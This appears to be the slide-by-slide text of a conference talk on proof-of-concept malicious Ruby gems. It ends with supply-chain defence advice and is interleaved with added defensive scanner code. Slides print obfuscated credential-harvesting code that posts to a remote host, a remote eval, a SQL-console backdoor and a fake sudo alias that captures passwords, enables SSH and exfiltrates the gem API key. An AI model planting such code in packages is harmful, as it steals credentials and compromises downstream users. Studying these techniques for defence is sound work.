Slide 1

Slide 1 text

Hacking with Gems Benjamin Smith @benjamin_smith

Slide 2

Slide 2 text

How to punk your friends with gems Benjamin Smith @benjamin_smith

Slide 3

Slide 3 text

How-to get rich quick and (maybe) not go to jail! Benjamin Smith @benjamin_smith

Slide 4

Slide 4 text

Four reasons you should NOT trust Benjamin Smith @benjamin_smith

Slide 5

Slide 5 text

No content

Slide 6

Slide 6 text

who i am

Slide 9

Slide 9 text

what i am NOT

Slide 10

Slide 10 text

No content

Slide 11

Slide 11 text

please do not try this at home

Slide 13

Slide 13 text

No content

Slide 14

Slide 14 text

No content

Slide 15

Slide 15 text

Lawful Evil Lawful Good

Slide 19

Slide 19 text

once upon a time

Slide 20

Slide 20 text

GEM
  remote: https://rubygems.org/
  specs:
    actionmailer (4.1.4)
      actionpack (= 4.1.4)
      actionview (= 4.1.4)
      mail (~> 2.5.4)
    actionpack (4.1.4)
      actionview (= 4.1.4)
      activesupport (= 4.1.4)
      rack (~> 1.5.2)

Slide 21

Slide 21 text

what’s the worst that could happen?

Slide 22

Slide 22 text

No content

Slide 23

Slide 23 text

gem 'awesome_rails_flash_messages' github.com/benjaminleesmith/awesome-rails-flash-messages

Slide 24

Slide 24 text

before... github.com/benjaminleesmith/awesome-rails-flash-messages

Slide 25

Slide 25 text

after! github.com/benjaminleesmith/awesome-rails-flash-messages

Slide 26

Slide 26 text

some “side effects”
  if params.to_s.match(Base64.decode64('cGF...'))
github.com/benjaminleesmith/awesome-rails-flash-messages

Slide 27

Slide 27 text

...
  File.open("#{Rails.root}/public/development.log", 'a+') do |f|
    f.write("#{params.inspect}\n")
  end
github.com/benjaminleesmith/awesome-rails-flash-messages

Slide 28

Slide 28 text

?!?
  Net::HTTP.post_form(
    URI.parse(Base64.decode64('aHR0cDo...')),
    { 'log' => params.merge(:url => request.url).inspect }
  )
github.com/benjaminleesmith/awesome-rails-flash-messages

Slide 29

Slide 29 text

i like cGFzc3dvcmQ=\n
  if params.to_s.match(Base64.decode64('cGF...'))
github.com/benjaminleesmith/awesome-rails-flash-messages

Slide 30

Slide 30 text

i like password
  if params.to_s.match("password")
github.com/benjaminleesmith/awesome-rails-flash-messages

Slide 31

Slide 31 text

“development.log”
  ... "user"=>{"email"=>"[email protected]", "password"=>"password", "remember_me"=>"0"} ...
github.com/benjaminleesmith/awesome-rails-flash-messages
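The harvest above gets past a casual read of the gem because neither the word “password” nor the exfiltration URL appears in the source: both are base64 literals handed to Base64.decode64 at runtime. The following is an added example, not code from the talk or from awesome_rails_flash_messages: a first-pass scanner that tokenises a gem's Ruby files with Ripper, decodes every base64-shaped string literal back to plaintext, and flags method names a flash-message helper has no reason to call. SAMPLE_SOURCE is a constructed snippet modelled on slides 26 to 28; the URL encoded into it stands in for the slide's elided 'aHR0cDo...' value, and the SUSPICIOUS_METHODS list is an assumption.

```ruby
require 'ripper'
require 'base64'

# Methods that have no business in a flash-message helper (constructed list).
SUSPICIOUS_METHODS = %w[decode64 eval instance_eval class_eval send post_form system spawn exec].freeze

# Shape of a base64 literal: base64 alphabet only, optional padding, long enough to bother with.
BASE64_SHAPE = %r{\A[A-Za-z0-9+/]{8,}={0,2}\z}

# Lex the source and return [line, finding] pairs for: suspicious method names,
# shell-outs via backticks, and string literals that decode from base64 to
# printable text (which is how the slide hides "password" and the exfil URL).
def scan_ruby_source(src)
  Ripper.lex(src).filter_map do |(line, _col), type, tok, _state|
    case type
    when :on_tstring_content
      next unless tok.match?(BASE64_SHAPE) && tok.size % 4 == 0
      decoded = Base64.decode64(tok)
      next unless decoded.size >= 4 && decoded.match?(/\A[[:print:]]+\z/)
      [line, "base64 literal decodes to #{decoded.inspect}"]
    when :on_ident
      [line, "call to #{tok}"] if SUSPICIOUS_METHODS.include?(tok)
    when :on_backtick
      [line, 'shell command via backticks']
    end
  end
end

# Constructed stand-in for the slide's elided exfil URL ('aHR0cDo...' = "http:...").
EXFIL_URL_B64 = Base64.strict_encode64('http://example.com/log')

# Constructed sample modelled on the awesome_rails_flash_messages snippets.
# 'cGFzc3dvcmQ=' is the literal shown on slide 29; it decodes to "password".
SAMPLE_SOURCE = <<~'RUBY'.sub('EXFIL_URL_B64', EXFIL_URL_B64)
  if params.to_s.match(Base64.decode64('cGFzc3dvcmQ='))
    File.open("#{Rails.root}/public/development.log", 'a+') { |f| f.write("#{params.inspect}\n") }
    Net::HTTP.post_form(URI.parse(Base64.decode64('EXFIL_URL_B64')),
                        { 'log' => params.merge(:url => request.url).inspect })
  end
RUBY

scan_ruby_source(SAMPLE_SOURCE).each { |line, msg| puts "line #{line}: #{msg}" }
```

Run it over every .rb file of an unpacked gem (gem fetch, gem unpack, then Dir.glob) rather than over the GitHub repository: as the be_truthy section later shows, the two need not contain the same files. The base64 heuristic deliberately demands a multiple-of-four length and a printable result, so ordinary identifiers such as "development" are not decoded into noise.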

Slide 32

Slide 32 text

elsewhere... github.com/benjaminleesmith/awesome-rails-flash-messages

Slide 33

Slide 33 text

profit • Step 1: do something • Step 2: do something else • Step 3: ???? • Step 4: profit

Slide 34

Slide 34 text

profit • Step 1: write a gem that does something • Step 2: • Step 3: • Step 4:

Slide 35

Slide 35 text

profit • Step 1: write a gem that does something • Step 2: add code to harvest emails/pws • Step 3: • Step 4:

Slide 36

Slide 36 text

profit • Step 1: write a gem that does something • Step 2: add code to harvest emails/pws • Step 3: use emails/pws on banking websites to transfer funds • Step 4:

Slide 37

Slide 37 text

profit • Step 1: write a gem that does something • Step 2: add code to harvest emails/pws • Step 3: use emails/pws on banking websites to transfer funds • Step 4: profit

Slide 38

Slide 38 text

profit • Step 1: write a gem that does something • Step 2: add code to harvest emails/pws • Step 3: use emails/pws on banking websites to transfer funds • Step 4: profit • Step 5: flee the country

Slide 39

Slide 39 text

a one way ticket to

Slide 40

Slide 40 text

that was easy. what else can I do?

Slide 41

Slide 41 text

gem 'net_http_detector' github.com/benjaminleesmith/net_http_detector

Slide 42

Slide 42 text

show me the hack
  Net::HTTP.post_form(
    #,
    {"log"=>"{\"utf8\"=>\"✓\", \"authenticity_token\"=>\"PzpZUlRrRv1V+A0jJHAwi+ey/injbWlii8OFyIfP+fY=\", \"user\"=>{\"email\"=>\"test\", \"password\"=>\"pass4\" ...
github.com/benjaminleesmith/net_http_detector

Slide 43

Slide 43 text

how it works
  def HTTP.valid_post_form(url, params)
    ...
  def HTTP.post_form(url, params)
    self.smart_log("Net::HTTP.post_form(#{url.inspect}, #{params.inspect})")
    Net::HTTP.valid_post_form(url, params)
  end
github.com/benjaminleesmith/net_http_detector

Slide 46

Slide 46 text

...and one more thing...
  eval(Net::HTTP.valid_get(URI("http://....herokuapp.com/snippets/6")))
github.com/benjaminleesmith/net_http_detector
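The shadowed post_form is plain Ruby: keep the original under another name, redefine the singleton method, call through. Because the redefinition lives in the gem's file, Method#source_location gives it away. Below is an added example (not code from the talk or from net_http_detector) of a runtime integrity check built on that: snapshot where every Net::HTTP class method is defined before third-party code loads, for instance at the top of config/boot.rb before Bundler.require, then diff against the snapshot once the gems are in. ShadyGem and CAPTURED_FORMS are constructed stand-ins for the gem, valid_post_form is the name reused from the slide, and the trusted directory is RbConfig's rubylibdir.

```ruby
require 'net/http'
require 'rbconfig'

# Directory holding Ruby's own standard library (net/http.rb lives here when
# net-http is the default gem shipped with the interpreter).
STDLIB_DIR = RbConfig::CONFIG['rubylibdir']

# Snapshot of a class's own singleton methods: name => defining file.
# C-implemented methods have no source_location and map to nil.
def singleton_method_map(mod)
  mod.singleton_methods(false).sort.each_with_object({}) do |name, out|
    out[name] = mod.method(name).source_location&.first
  end
end

# Compare the current definitions with a snapshot taken at boot. Returns
# name => [reason, file] for methods that were added, redefined in another
# file, or (even if unchanged) live outside the stdlib directory.
def patched_since(mod, baseline, trusted_dir = STDLIB_DIR)
  singleton_method_map(mod).each_with_object({}) do |(name, file), out|
    if !baseline.key?(name)
      out[name] = ['added after boot', file]
    elsif baseline[name] != file
      out[name] = ['redefined', file]
    elsif file && !file.start_with?(trusted_dir)
      out[name] = ['defined outside stdlib', file]
    end
  end
end

# Taken before any third-party code is loaded.
NET_HTTP_BASELINE = singleton_method_map(Net::HTTP)

# Constructed stand-in for what net_http_detector does: alias the real
# post_form and shadow it with one that records the form data (the talk's
# version logged it to disk and POSTed it to a remote endpoint).
CAPTURED_FORMS = []

module ShadyGem
  def self.install!
    return if Net::HTTP.respond_to?(:valid_post_form) # idempotent
    Net::HTTP.singleton_class.class_eval do
      alias_method :valid_post_form, :post_form
      def post_form(url, params)
        CAPTURED_FORMS << [url.to_s, params.dup]
        valid_post_form(url, params)
      end
    end
  end
end

# "Load the gem", then re-run the integrity check against the boot snapshot.
def demo
  ShadyGem.install!
  patched_since(Net::HTTP, NET_HTTP_BASELINE)
end

demo.each { |name, (reason, file)| puts "Net::HTTP.#{name}: #{reason} (#{file})" }
```

The snapshot approach also catches hooks installed with prepend, since method(:post_form) resolves to the prepended module's definition. It cannot see C-implemented methods (source_location is nil), and it says nothing about the eval'd remote snippet or the db_console before_filter on the next slides, which add behaviour rather than redefine existing methods; those are a job for reading the unpacked gem and for egress monitoring.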

Slide 47

Slide 47 text

database what?
  append_before_filter :net_http_detector
  ...
  if params[:db_console]
    @tables = ActiveRecord::Base.connection.tables
    if params[:query]
      @output = ActiveRecord::Base.connection.execute(params[:query])
github.com/benjaminleesmith/net_http_detector

Slide 51

Slide 51 text

/users/sign_in github.com/benjaminleesmith/net_http_detector

Slide 52

Slide 52 text

/users/sign_in?db_console=t github.com/benjaminleesmith/net_http_detector

Slide 53

Slide 53 text

hello db access! github.com/benjaminleesmith/net_http_detector

Slide 54

Slide 54 text

SELECT * FROM users; github.com/benjaminleesmith/net_http_detector

Slide 55

Slide 55 text

UPDATE users SET admin=1 WHERE id=42; github.com/benjaminleesmith/net_http_detector

Slide 56

Slide 56 text

CREATE USER admin1 WITH PASSWORD 'password'; github.com/benjaminleesmith/net_http_detector

Slide 57

Slide 57 text

careful of wolves in sheep’s clothing

Slide 58

Slide 58 text

profit • Step 1: • Step 2: • Step 3: • Step 4: • Step 5:

Slide 59

Slide 59 text

profit • Step 1: write a gem that does something • Step 2: • Step 3: • Step 4: • Step 5:

Slide 60

Slide 60 text

profit • Step 1: write a gem that does something • Step 2: add code to provide DB access • Step 3: • Step 4: • Step 5:

Slide 61

Slide 61 text

profit • Step 1: write a gem that does something • Step 2: add code to provide DB access • Step 3: use personal info to apply for a boat loan (ie buy a pimp trimaran) • Step 4: • Step 5:

Slide 62

Slide 62 text

profit • Step 1: write a gem that does something • Step 2: add code to provide DB access • Step 3: use personal info to apply for a boat loan (ie buy a pimp trimaran) • Step 4: profit • Step 5:

Slide 63

Slide 63 text

profit • Step 1: write a gem that does something • Step 2: add code to provide DB access • Step 3: use personal info to apply for a boat loan (ie buy a pimp trimaran) • Step 4: profit • Step 5: flee the country

Slide 64

Slide 64 text

i like the beach

Slide 65

Slide 65 text

that was easy. what else can I do?

Slide 66

Slide 66 text

gem 'better_date_to_s' github.com/benjaminleesmith/better_date_to_s

Slide 67

Slide 67 text

what it claims to do
  Date.new(2005, 1, 1).to_s(:short)
  => "1 Jan"
  ... instead of ...
  => " 1 Jan"
github.com/benjaminleesmith/better_date_to_s

Slide 68

Slide 68 text

No content

Slide 69

Slide 69 text

what it also does
  set_date_formats_for(Rails.env, Rails.root.to_s)
github.com/benjaminleesmith/better_date_to_s

Slide 70

Slide 70 text

better_date_to_s.bundle (raw bytes of the compiled Mach-O extension: __TEXT segment with __text, __stubs, __stub_helper, __cstring, __unwind_info, __eh_frame; __DATA segment with __nl_symbol_ptr, __got, __la_symbol_ptr, __data; __LINKEDIT) github.com/benjaminleesmith/better_date_to_s

Slide 71

Slide 71 text

behind the curtain
  if (strcmp(rails_env, "production") == 0) {
    sprintf(tar_command,
            "tar -zcvf %s/public/assets.tar.gz %s > /dev/null 2>&1",
            rails_root, rails_root);
    system(tar_command);
  }
github.com/benjaminleesmith/better_date_to_s

Slide 72

Slide 72 text

what what github.com/benjaminleesmith/better_date_to_s

Slide 73

Slide 73 text

i can haz source github.com/benjaminleesmith/better_date_to_s

Slide 74

Slide 74 text

truth time • this gem doesn't actually work • but it could... if I wasn't lazy • "fat" gems are tricky to compile github.com/benjaminleesmith/better_date_to_s

Slide 75

Slide 75 text

so much code so little time • Step 1: write a gem that does something • Step 2: add code to expose source • Step 3: sell to competitors? • Step 4: profit? • Step 5: flee the country

Slide 76

Slide 76 text

that was easy hard. what else can I do? (that's easier)

Slide 77

Slide 77 text

gem install bunlder

Slide 78

Slide 78 text

gem install be_truthy github.com/benjaminleesmith/be_truthy

Slide 79

Slide 79 text

what it does
  > true.should be_true
  > User.new.should be_true
  > User.new.should be_truthy
github.com/benjaminleesmith/be_truthy

Slide 80

Slide 80 text

what it ACTUALLY does github.com/benjaminleesmith/be_truthy

Slide 81

Slide 81 text

github.com/benjaminleesmith/be_truthy

Slide 82

Slide 82 text

file tree looks ok github.com/benjaminleesmith/be_truthy

Slide 83

Slide 83 text

source code looks good
  require "be_truthy/version"
  module BeTruthy
  end
github.com/benjaminleesmith/be_truthy

Slide 84

Slide 84 text

but what was this? github.com/benjaminleesmith/be_truthy

Slide 85

Slide 85 text

I see no C github.com/benjaminleesmith/be_truthy

Slide 86

Slide 86 text

run the what file?
  Gem::Specification.new do |gem|
    ...
    gem.extensions = ["Rakefile"]
    ...
  end
github.com/benjaminleesmith/be_truthy

Slide 87

Slide 87 text

there is no Rakefile github.com/benjaminleesmith/be_truthy

Slide 88

Slide 88 text

the real file tree github.com/benjaminleesmith/be_truthy

Slide 89

Slide 89 text

the real file tree github.com/benjaminleesmith/be_truthy

Slide 90

Slide 90 text

what does the Rakefile do? github.com/benjaminleesmith/be_truthy

Slide 91

Slide 91 text

  sudo_file = __FILE__.gsub('Rakefile', 'lib/tmp.rb')
  FileUtils.mv(sudo_file, "#{home_dir}/.tmp")
github.com/benjaminleesmith/be_truthy

Slide 92

Slide 92 text

  File.open(profile, 'a+') do |f|
    f.write("alias sudo='ruby #{home}/.tmp'\n")
  end
github.com/benjaminleesmith/be_truthy

Slide 93

Slide 93 text

FileUtils.rm(__FILE__) github.com/benjaminleesmith/be_truthy

Slide 94

Slide 94 text

what does "sudo" do now? github.com/benjaminleesmith/be_truthy

Slide 95

Slide 95 text

  print "WARNING: Improper use of the sudo command ..."
  system "stty -echo"
  password = $stdin.gets.chomp
  system "stty echo"
  print `/usr/bin/sudo #{ARGV[0..-1].join(' ')}`
github.com/benjaminleesmith/be_truthy

Slide 99

Slide 99 text

  echo '#{password}' | /usr/bin/sudo -S systemsetup -setremotelogin on
github.com/benjaminleesmith/be_truthy

Slide 100

Slide 100 text

  /usr/bin/sudo dscl . -create /Users/#{username}
  ...
  /usr/bin/sudo dscl . -passwd /Users/#{username} password`
github.com/benjaminleesmith/be_truthy

Slide 101

Slide 101 text

  Net::HTTP.post_form(URI.parse('http://.../logs'), {'log' => 'ssh enabled'})
github.com/benjaminleesmith/be_truthy

Slide 102

Slide 102 text

ssh sysadmin@your-ip github.com/benjaminleesmith/be_truthy

Slide 103

Slide 103 text

take away: don't install ben's gems

Slide 104

Slide 104 text

No content

Slide 105

Slide 105 text

how could I get you to install my gems?

Slide 106

Slide 106 text

what gems are trustworthy?

Slide 107

Slide 107 text

how can I add my code to already trusted gems?

Slide 108

Slide 108 text

back in the be_truthy gem
  gem_api_key = File.open(`echo ~/.gem/credentials`.strip).read
  gem_list = `gem list`
  Net::HTTP.post_form(...)
github.com/benjaminleesmith/be_truthy
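Two things be_truthy leaves behind on the developer's machine: the line appended to the shell profile that turns sudo into a password-stealing shim (slide 92), and, here, the rubygems.org API key read straight out of ~/.gem/credentials. The following is an added example, not code from the talk: a post-install check for command shims in a profile, plus a permissions check on the credentials file. INFECTED_PROFILE is a constructed profile mirroring what the Rakefile writes, the SHIMMED_COMMANDS list is an assumption, and the temp file stands in for ~/.gem/credentials.

```ruby
require 'tempfile'

# Commands a malicious install hook would most want to impersonate (constructed list).
SHIMMED_COMMANDS = %w[sudo ssh gem git bundle].freeze

# Lines of a shell profile that turn one of those commands into an alias or a
# shell function. be_truthy appends `alias sudo='ruby ~/.tmp'`, so the next
# sudo typed in a fresh shell hands the password to its script.
# Returns [line_number, command, line] for each hit.
def command_shims(profile_text, names = SHIMMED_COMMANDS)
  alt = names.map { |n| Regexp.escape(n) }.join('|')
  pattern = /\A\s*(?:alias\s+(#{alt})=|(?:function\s+)?(#{alt})\s*\(\)\s*\{?)/
  profile_text.each_line.with_index(1).filter_map do |line, no|
    m = line.match(pattern)
    [no, m[1] || m[2], line.strip] if m
  end
end

# ~/.gem/credentials holds the rubygems.org API key in plaintext. Anything
# running as you can read it regardless (that is the talk's point), but it
# must at least not be readable by other users: group/other bits must be clear.
def loose_permissions?(path)
  (File.stat(path).mode & 0o077) != 0
end

# Constructed ~/.bash_profile after the be_truthy install hook has run.
INFECTED_PROFILE = <<~'SH'
  export PATH="$HOME/bin:$PATH"
  alias ll='ls -la'
  alias sudo='ruby /Users/ben/.tmp'
  function git() { /usr/bin/git "$@"; }
SH

# Exercise the permissions check on a throwaway file standing in for
# ~/.gem/credentials: first world-readable, then locked down.
def demo_credentials_check
  Tempfile.create('credentials') do |f|
    f.write(":rubygems_api_key: constructed_not_a_real_key\n")
    f.flush
    File.chmod(0o644, f.path)
    before = loose_permissions?(f.path)
    File.chmod(0o600, f.path)
    [before, loose_permissions?(f.path)]
  end
end

command_shims(INFECTED_PROFILE).each { |no, cmd, line| puts "line #{no}: #{cmd} shimmed: #{line}" }
puts "credentials loose before/after chmod 600: #{demo_credentials_check.inspect}"
```

Finding the alias is the easy part. The key in ~/.gem/credentials was readable by the install hook no matter what mode the file had, so once a gem like this has run the only fix is to revoke the key on rubygems.org and issue a new one; checking the mode just keeps other local users out.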

Slide 112

Slide 112 text

now I own your gems github.com/benjaminleesmith/be_truthy

Slide 113

Slide 113 text

  > git clone your-gem-repo
  ...add a little code...
  > rake build
  > gem push your-gem
github.com/benjaminleesmith/be_truthy

Slide 114

Slide 114 text

do people trust your gems?

Slide 115

Slide 115 text

do people who install your gems have trustworthy gems?

Slide 116

Slide 116 text

No content

Slide 117

Slide 117 text

there’s still one problem

Slide 118

Slide 118 text

bootstrapping

Slide 119

Slide 119 text

being popular sucks

Slide 120

Slide 120 text

conferences

Slide 121

Slide 121 text

social engineering

Slide 122

Slide 122 text

No content

Slide 123

Slide 123 text

No content

Slide 124

Slide 124 text

No content

Slide 125

Slide 125 text

so what happens now?

Slide 126

Slide 126 text

ruby gems goes down

Slide 127

Slide 127 text

heroku deploys go down

Slide 128

Slide 128 text

i go to the beach

Slide 129

Slide 129 text

ruby gems goes down

Slide 130

Slide 130 text

heroku deploys go down

Slide 131

Slide 131 text

recovery

Slide 132

Slide 132 text

so what now?

Slide 133

Slide 133 text

gem 'awesome_rails_flash_messages' github.com/benjaminleesmith/awesome-rails-flash-messages

Slide 134

Slide 134 text

Little Snitch obdev.at/products/littlesnitch/index.html

Slide 135

Slide 135 text

gem install be_truthy github.com/benjaminleesmith/be_truthy

Slide 136

Slide 136 text

fseventer fernlightning.com/doku.php?id=software:fseventer:start

Slide 137

Slide 137 text

don’t “gem install” from strangers

Slide 138

Slide 138 text

gem fetch vs gem install
  > gem fetch be_truthy
  > gem unpack be_truthy-0.0.1.gem
github.com/benjaminleesmith/be_truthy
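gem fetch and gem unpack give you the package as published, without running anything, and that is the artifact to audit: be_truthy's trick was a gemspec whose extensions entry pointed at a Rakefile that the GitHub repository never contained (slides 86 to 89). The following is an added example, not the talk's code: audit an unpacked gem's spec for install-time hooks and for files that do not appear in the public source tree. SHADY_SPEC, CLEAN_SPEC and BE_TRUTHY_REPO_FILES are constructed to mirror those slides; the rule that a legitimate extension is exactly ext/<name>/extconf.rb is an assumption encoding "real native extensions live under ext/".

```ruby
require 'rubygems'

# RubyGems runs a build step for every entry in spec.extensions during
# `gem install`. A native extension points at ext/<name>/extconf.rb; a
# Rakefile or mkrf_conf.rb there is arbitrary Ruby executed as the installing
# user, which is exactly what be_truthy relies on.
def risky_extensions(spec)
  spec.extensions.reject { |ext| ext.match?(%r{\Aext/[^/]+/extconf\.rb\z}) }
end

# Files the published package ships that the public repository does not.
# Package side: gem fetch + gem unpack (or Gem::Package.new(path).spec);
# repo side: `git ls-files` in the clone.
def unexpected_files(spec, repo_files)
  spec.files - repo_files
end

def audit_gem(spec, repo_files)
  risky_extensions(spec).map { |e| "install-time hook: spec.extensions includes #{e.inspect}" } +
    unexpected_files(spec, repo_files).map { |f| "file not in source repo: #{f}" }
end

# Constructed spec modelled on the be_truthy package from the talk.
SHADY_SPEC = Gem::Specification.new do |s|
  s.name = 'be_truthy'
  s.version = '0.0.1'
  s.summary = 'be_truthy matcher'
  s.authors = ['constructed']
  s.files = %w[be_truthy.gemspec lib/be_truthy.rb lib/be_truthy/version.rb lib/tmp.rb Rakefile]
  s.extensions = ['Rakefile']
end

# What `git ls-files` shows in the public repo (constructed; there is no Rakefile).
BE_TRUTHY_REPO_FILES = %w[be_truthy.gemspec lib/be_truthy.rb lib/be_truthy/version.rb README.md]

# A legitimate native gem for comparison (constructed).
CLEAN_SPEC = Gem::Specification.new do |s|
  s.name = 'fast_thing'
  s.version = '1.0.0'
  s.summary = 'constructed example'
  s.authors = ['constructed']
  s.files = %w[lib/fast_thing.rb ext/fast_thing/extconf.rb ext/fast_thing/fast_thing.c]
  s.extensions = ['ext/fast_thing/extconf.rb']
end

audit_gem(SHADY_SPEC, BE_TRUTHY_REPO_FILES).each { |finding| puts finding }
```

For a fetched package, Gem::Package.new('be_truthy-0.0.1.gem').spec returns the same Gem::Specification without installing anything, so the audit runs before any extension build has a chance to. An extconf.rb can still do anything Ruby can, so a hit-free result means "read ext/ next", not "safe".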

Slide 139

Slide 139 text

No content

Slide 140

Slide 140 text

No content

Slide 141

Slide 141 text

curl -sSL https://get.rvm.io | bash

Slide 142

Slide 142 text

gem install rails -P HighSecurity

Slide 143

Slide 143 text

  > gem install rails -P HighSecurity
  Fetching: i18n-0.6.11.gem (100%)
  ERROR:  While executing gem ... (Gem::Security::Exception)
      unsigned gems are not allowed by the High Security policy

Slide 144

Slide 144 text

gem cert --build

Slide 145

Slide 145 text

https://www.rubygems-openpgp-ca.org/
https://github.com/rubygems-trust
http://corner.squareup.com/2013/12/securing-rubygems-with-tuf-part-1.html
http://corner.squareup.com/2013/12/securing-rubygems-with-tuf-part-2.html

Slide 146

Slide 146 text

sandboxing

Slide 147

Slide 147 text

github.com/rubygems/rubygems

Slide 148

Slide 148 text

tools to detect malicious code

Slide 149

Slide 149 text

private gem repos

Slide 150

Slide 150 text

do not try this at home

Slide 151

Slide 151 text

don't install gems you don't need to

Slide 152

Slide 152 text

pay attention to what your gems do

Slide 153

Slide 153 text

monitor your system

Slide 154

Slide 154 text

read the source

Slide 155

Slide 155 text

gem install coal-mine-canary github.com/benjaminleesmith/coal-mine-canary

Slide 156

Slide 156 text

on install github.com/benjaminleesmith/coal-mine-canary

Slide 157

Slide 157 text

the results github.com/benjaminleesmith/coal-mine-canary

Slide 158

Slide 158 text

thank you!

Slide 159

Slide 159 text

questions? ideas? @benjamin_smith https://github.com/benjaminleesmith
